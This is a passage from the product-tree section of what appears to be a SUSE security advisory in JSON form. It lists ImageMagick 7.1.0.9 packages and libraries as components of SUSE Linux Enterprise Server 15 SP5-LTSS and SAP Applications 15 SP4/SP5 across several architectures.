"name": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64 as component of SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64"
},
"product_reference": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le as component of SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le"
},
"product_reference": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x as component of SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x"
},
"product_reference": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64 as component of SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64"
},
"product_reference": "ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le as component of SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le"
},
"product_reference": "ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-7.1.0.9-150400.6.40.1.s390x as component of SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.s390x"
},
"product_reference": "ImageMagick-devel-7.1.0.9-150400.6.40.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64 as component of SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64"
},
"product_reference": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le as component of SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le"
},
"product_reference": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.s390x as component of SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.s390x"
},
"product_reference": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64 as component of SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64"
},
"product_reference": "libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le as component of SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le"
},
"product_reference": "libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-devel-7.1.0.9-150400.6.40.1.s390x as component of SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.s390x"
},
"product_reference": "libMagick++-devel-7.1.0.9-150400.6.40.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64 as component of SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64"
},
"product_reference": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le as component of SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le"
},
"product_reference": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x as component of SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x"
},
"product_reference": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64 as component of SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64"
},
"product_reference": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le as component of SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le"
},
"product_reference": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x as component of SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x"
},
"product_reference": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64 as component of SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64"
},
"product_reference": "perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le as component of SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le"
},
"product_reference": "perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perl-PerlMagick-7.1.0.9-150400.6.40.1.s390x as component of SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.s390x"
},
"product_reference": "perl-PerlMagick-7.1.0.9-150400.6.40.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-7.1.0.9-150400.6.40.1.ppc64le as component of SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le"
},
"product_reference": "ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le as component of SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le"
},
"product_reference": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le as component of SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le"
},
"product_reference": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le as component of SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le"
},
"product_reference": "ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le as component of SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le"
},
"product_reference": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le as component of SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le"
},
"product_reference": "libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le as component of SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le"
},
"product_reference": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le as component of SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le"
},
"product_reference": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le as component of SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP4:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le"
},
"product_reference": "perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP4:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-7.1.0.9-150400.6.40.1.ppc64le as component of SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le"
},
"product_reference": "ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le as component of SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le"
},
"product_reference": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le as component of SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le"
},
"product_reference": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le as component of SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le"
},
"product_reference": "ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le as component of SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le"
},
"product_reference": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le as component of SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le"
},
"product_reference": "libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le as component of SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le"
},
"product_reference": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
